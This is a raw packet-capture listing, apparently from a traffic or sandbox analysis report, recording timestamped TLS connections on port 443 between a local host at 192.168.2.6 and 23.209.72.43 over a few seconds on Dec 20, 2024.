                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190514088 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190530062 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190577984 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190599918 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190615892 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190726042 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190740108 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190756083 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.190772057 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.191504955 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207447052 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207504034 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207520008 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207588911 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207644939 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207660913 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207678080 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207881927 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207891941 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.207909107 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.208097935 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.221460104 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.221575975 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.250565052 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.251326084 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.255748987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.292026997 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.314306974 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.341995955 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.346556902 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.346636057 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.346648932 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.346817017 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.346870899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.346971035 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.346973896 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.347012997 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.347122908 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.347124100 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.347244024 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.676203966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.676300049 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.676316023 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.676444054 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.678922892 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.695997000 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696111917 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696217060 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696232080 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696284056 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696300983 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696414948 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696422100 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696438074 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696453094 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696470976 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696485043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.696577072 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.700552940 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.705864906 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.705904961 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.705919981 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.706032038 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.706046104 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.706060886 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.706077099 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.706257105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.706270933 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.706286907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717557907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717618942 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717633963 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717761040 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717776060 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717789888 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717807055 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717888117 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717928886 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.717945099 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.719079971 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.719238997 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.719743967 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.727787971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.727829933 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.727845907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.727931023 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.727989912 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.728004932 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.728019953 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.728123903 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.728147030 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.738377094 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.915438890 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.981810093 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.985894918 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.985996008 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.986099005 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.986112118 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.986121893 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:51.986387968 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.012026072 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.015682936 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.015861988 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.033036947 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.033181906 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.033256054 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.033266068 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.033341885 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.040751934 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.052553892 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060252905 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060416937 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060512066 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060523033 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060578108 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060591936 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060609102 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060643911 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:52.060764074 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055780888 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055881977 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055896044 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055908918 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055929899 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.055943966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.056066990 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.056545973 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.057831049 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.057945013 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.057957888 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.057971001 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058079958 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058092117 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058105946 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058120966 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058244944 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058259964 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058598995 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.058737993 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.063199997 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069068909 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069159985 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069174051 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069227934 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069242001 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069256067 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069350958 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069418907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069442987 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069457054 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.069880962 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.071491003 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083329916 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083343983 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083357096 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083431959 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083445072 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083528996 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083542109 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083555937 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083698034 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083710909 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.083724022 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.088613987 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090488911 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090517998 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090532064 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090663910 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090677977 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090691090 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090704918 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.090816021 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.093873024 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.184144974 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189264059 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189279079 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189291954 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189455032 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.189466953 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.190053940 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.198096037 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.207031012 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213155031 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213421106 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213865995 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213879108 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.213893890 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214004993 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214019060 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214031935 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214046001 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214204073 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214216948 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214231968 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.214935064 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.224628925 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.260781050 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.374779940 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.870727062 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.876679897 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.876924038 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877027988 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877091885 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877152920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877170086 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877259970 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877285004 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877310038 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877325058 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.877340078 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:53.908889055 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.052409887 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.084285975 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.107939005 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115099907 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115124941 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115139961 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115154982 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115348101 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115361929 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.115463972 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.120975971 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.120990992 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.123367071 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.123379946 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.127367020 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.131361961 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.131591082 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.131608009 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.131624937 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.132275105 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.132287979 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.132299900 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.134253979 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.134718895 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.136046886 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.145090103 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.145103931 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.149441004 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.149455070 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.149466991 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.149701118 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151226044 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151240110 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151364088 CET4436053923.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151591063 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.151669025 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.200722933 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.215179920 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.273266077 CET60539443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.453550100 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.461545944 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.461884975 CET65014443192.168.2.623.209.72.43
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462007046 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462130070 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462308884 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462321043 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462363005 CET4436501423.209.72.43192.168.2.6
                                                                                                                                                                                                                                                                                                Dec 20, 2024 07:31:54.462373972 CET4436501423.209.72.43192.168.2.6
